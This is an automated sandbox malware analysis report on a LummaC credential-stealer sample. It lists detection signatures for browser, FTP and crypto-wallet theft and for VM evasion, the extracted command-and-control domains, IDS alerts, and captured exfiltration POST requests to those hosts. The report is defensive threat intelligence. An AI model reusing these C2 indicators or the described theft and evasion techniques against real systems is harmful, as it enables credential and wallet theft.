Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
nvtoaldlrg.exe

Overview

General Information

Sample name:nvtoaldlrg.exe
Analysis ID:1637345
MD5:4a0c3d026246920f6b8bd466cc5fdd8c
SHA1:2536873426bdcd8cdc5fa40b54d68cdf1a0766ff
SHA256:fdba4cab6bb651c5ffecf92d1bfd3de70ef5433a6aea4976db9753742799b7a3
Tags:exeuser-TornadoAV_dev
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Joe Sandbox ML detected suspicious sample
PE file has nameless sections
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • nvtoaldlrg.exe (PID: 7128 cmdline: "C:\Users\user\Desktop\nvtoaldlrg.exe" MD5: 4A0C3D026246920F6B8BD466CC5FDD8C)
  • cleanup

Malware Configuration

Threatname: LummaC

{"C2 url": ["citydisco.bet/gdJIS", "featureccus.shop/bdMAn", "mrodularmall.top/aNzS", "jowinjoinery.icu/bdWUa", "legenassedk.top/bdpWO", "htardwarehu.icu/Sbdsa", "cjlaspcorne.icu/DbIps", "bugildbett.top/bAuz"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000003.921555375.000000000147F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    Process Memory Space: nvtoaldlrg.exe PID: 7128JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      Process Memory Space: nvtoaldlrg.exe PID: 7128JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.2.nvtoaldlrg.exe.ac0000.0.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security

          Sigma Signatures

          No Sigma rule has matched

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-03-13T14:58:01.184550+010020283713Unknown Traffic192.168.2.849724104.73.234.102443TCP
          2025-03-13T14:58:01.184550+010020283713Unknown Traffic192.168.2.849694188.114.96.3443TCP
          2025-03-13T14:58:01.184550+010020283713Unknown Traffic192.168.2.849685188.114.97.3443TCP
          2025-03-13T14:58:01.184550+010020283713Unknown Traffic192.168.2.849700104.21.80.1443TCP
          2025-03-13T14:58:01.184550+010020283713Unknown Traffic192.168.2.849688104.21.96.1443TCP
          2025-03-13T14:58:01.184550+010020283713Unknown Traffic192.168.2.849721104.73.234.102443TCP
          2025-03-13T14:58:01.184550+010020283713Unknown Traffic192.168.2.849709104.73.234.102443TCP
          2025-03-13T14:58:01.184550+010020283713Unknown Traffic192.168.2.849706104.73.234.102443TCP
          2025-03-13T14:58:01.184550+010020283713Unknown Traffic192.168.2.849712104.73.234.102443TCP
          2025-03-13T14:58:01.184550+010020283713Unknown Traffic192.168.2.849727104.73.234.102443TCP
          2025-03-13T14:58:01.184550+010020283713Unknown Traffic192.168.2.849718104.73.234.102443TCP
          2025-03-13T14:58:01.184550+010020283713Unknown Traffic192.168.2.849697104.21.48.1443TCP
          2025-03-13T14:58:01.184550+010020283713Unknown Traffic192.168.2.849703104.21.16.1443TCP
          2025-03-13T14:58:01.184550+010020283713Unknown Traffic192.168.2.849715104.73.234.102443TCP
          2025-03-13T14:58:01.184550+010020283713Unknown Traffic192.168.2.849691188.114.97.3443TCP
          2025-03-13T14:58:08.276345+010020283713Unknown Traffic192.168.2.849682188.114.97.3443TCP
          2025-03-13T14:58:10.966897+010020283713Unknown Traffic192.168.2.849683188.114.97.3443TCP
          2025-03-13T14:58:13.390678+010020283713Unknown Traffic192.168.2.849684188.114.97.3443TCP
          2025-03-13T14:58:21.057185+010020283713Unknown Traffic192.168.2.849730104.73.234.102443TCP
          2025-03-13T14:58:23.722136+010020283713Unknown Traffic192.168.2.849731104.73.234.102443TCP
          2025-03-13T14:58:26.347544+010020283713Unknown Traffic192.168.2.849733104.73.234.102443TCP
          2025-03-13T14:58:28.925365+010020283713Unknown Traffic192.168.2.849738188.114.96.3443TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus / Scanner detection for submitted sample
          Source: nvtoaldlrg.exeAvira: detected
          Antivirus detection for URL or domain
          Source: https://latchclan.shop:443/WjquwAvira URL Cloud: Label: malware
          Source: https://bugildbett.top:443/bAuzaMicrosoftAvira URL Cloud: Label: malware
          Source: https://featureccus.shop:443/bdMAnAvira URL Cloud: Label: malware
          Found malware configuration
          Source: 00000000.00000002.1045933046.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["citydisco.bet/gdJIS", "featureccus.shop/bdMAn", "mrodularmall.top/aNzS", "jowinjoinery.icu/bdWUa", "legenassedk.top/bdpWO", "htardwarehu.icu/Sbdsa", "cjlaspcorne.icu/DbIps", "bugildbett.top/bAuz"]}
          Multi AV Scanner detection for submitted file
          Source: nvtoaldlrg.exeVirustotal: Detection: 58%Perma Link
          Source: nvtoaldlrg.exeReversingLabs: Detection: 68%
          Joe Sandbox ML detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Sample uses string decryption to hide its real strings
          Source: 00000000.00000002.1045933046.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpString decryptor: citydisco.bet/gdJIS
          Source: 00000000.00000002.1045933046.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpString decryptor: featureccus.shop/bdMAn
          Source: 00000000.00000002.1045933046.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpString decryptor: mrodularmall.top/aNzS
          Source: 00000000.00000002.1045933046.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpString decryptor: jowinjoinery.icu/bdWUa
          Source: 00000000.00000002.1045933046.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpString decryptor: legenassedk.top/bdpWO
          Source: 00000000.00000002.1045933046.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpString decryptor: htardwarehu.icu/Sbdsa
          Source: 00000000.00000002.1045933046.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpString decryptor: cjlaspcorne.icu/DbIps
          Source: 00000000.00000002.1045933046.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpString decryptor: bugildbett.top/bAuz
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00ADBBD0 CryptUnprotectData,0_2_00ADBBD0
          Source: nvtoaldlrg.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49682 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49683 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49684 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.8:49730 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.8:49731 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.8:49733 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49738 version: TLS 1.2
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B50490 FindFirstFileW,0_2_00B50490
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 4x nop then push edi0_2_00ACEA60
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-5E8897A6h]0_2_00B0D380
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 4x nop then mov ebp, dword ptr [ecx+edx+3Ch]0_2_00B07840
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 4x nop then push 00000000h0_2_00ADBBD0
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 4x nop then mov dword ptr [esp+04h], ecx0_2_00B03CD0
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+14h]0_2_00B03CD0
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]0_2_00ACA2C0
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]0_2_00ACA2C0
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 4x nop then movzx edx, byte ptr [ecx+esi]0_2_00AC2790
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 4x nop then movzx edi, byte ptr [esp+ebx+07h]0_2_00AE4A30
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 4x nop then mov eax, ebx0_2_00AE4A30
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 4x nop then movsx edx, byte ptr [esi+eax]0_2_00ADACC0
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 93A82FD1h0_2_00ADAD90
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-3FFFFFFCh]0_2_00AE5080
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 4x nop then mov dword ptr [edi], esi0_2_00AC1040
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+00000184h]0_2_00AF53D0
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 4x nop then mov ecx, eax0_2_00B0B5D0
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 4x nop then mov ecx, eax0_2_00B0B670
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 4x nop then mov eax, dword ptr [edi+0Ch]0_2_00AC19E0
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 1ED597A4h0_2_00B07B00
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx+5E7F9582h]0_2_00B07D20

          Networking

          barindex
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: citydisco.bet/gdJIS
          Source: Malware configuration extractorURLs: featureccus.shop/bdMAn
          Source: Malware configuration extractorURLs: mrodularmall.top/aNzS
          Source: Malware configuration extractorURLs: jowinjoinery.icu/bdWUa
          Source: Malware configuration extractorURLs: legenassedk.top/bdpWO
          Source: Malware configuration extractorURLs: htardwarehu.icu/Sbdsa
          Source: Malware configuration extractorURLs: cjlaspcorne.icu/DbIps
          Source: Malware configuration extractorURLs: bugildbett.top/bAuz
          Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
          Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
          Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
          Source: Joe Sandbox ViewIP Address: 104.21.48.1 104.21.48.1
          Source: Joe Sandbox ViewIP Address: 104.21.48.1 104.21.48.1
          Source: Joe Sandbox ViewIP Address: 104.21.16.1 104.21.16.1
          Source: Joe Sandbox ViewIP Address: 104.21.16.1 104.21.16.1
          Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49684 -> 188.114.97.3:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49682 -> 188.114.97.3:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49731 -> 104.73.234.102:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49730 -> 104.73.234.102:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49683 -> 188.114.97.3:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49733 -> 104.73.234.102:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49738 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49724 -> 104.73.234.102:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49694 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49685 -> 188.114.97.3:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49700 -> 104.21.80.1:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49688 -> 104.21.96.1:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49721 -> 104.73.234.102:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49709 -> 104.73.234.102:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49706 -> 104.73.234.102:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49712 -> 104.73.234.102:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49727 -> 104.73.234.102:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49718 -> 104.73.234.102:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49697 -> 104.21.48.1:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49703 -> 104.21.16.1:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49715 -> 104.73.234.102:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49691 -> 188.114.97.3:443
          Source: global trafficHTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 73Host: citydisco.bet
          Source: global trafficHTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=g82Kw7030JG54MlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 14496Host: citydisco.bet
          Source: global trafficHTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6nR23kDEjUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15012Host: citydisco.bet
          Source: global trafficHTTP traffic detected: POST /bSHsyZD HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 111Host: guntac.bet
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
          Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
          Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
          Source: nvtoaldlrg.exe, 00000000.00000003.1045441184.00000000044B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/; equals www.youtube.com (Youtube)
          Source: nvtoaldlrg.exe, 00000000.00000002.1048162417.00000000044A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/;X-Frame-OptionsSAMEORIGINPersistent-AuthWWW-AuthenticateVarysteamCountry=US%7C83521ba33f152859d9ded61861c1940c; path=/; secure; HttpOnly; SameSite=Nonesessionid=740c83c77edb84e75be3f9bd; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35710Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveThu, 13 Mar 2025 13:58:26 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
          Source: nvtoaldlrg.exe, 00000000.00000003.994650409.000000000147F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/;X-Frame-OptionsSAMEORIGINPersistent-AuthWWW-AuthenticateVarysteamCountry=US%7C83521ba33f152859d9ded61861c1940c; path=/; secure; HttpOnly; SameSite=Nonesessionid=cac8a6ba4568ff49bb7a7ac9; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type26244Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveThu, 13 Mar 2025 13:58:24 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
          Source: nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: LRPC-2aa04708cc61a111adrecaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/;X-Frame-OptionsSAMEORIGINPersistent-AuthWWW-AuthenticateVarysteamCountry=US%7C83521ba33f152859d9ded61861c1940c; path=/; secure; HttpOnly; SameSite=Nonesessionid=cac8a6ba4568ff49bb7a7ac9; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type26244Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveThu, 13 Mar 2025 13:58:24 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
          Source: nvtoaldlrg.exe, 00000000.00000002.1048162417.00000000044A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/; equals www.youtube.com (Youtube)
          Source: nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host 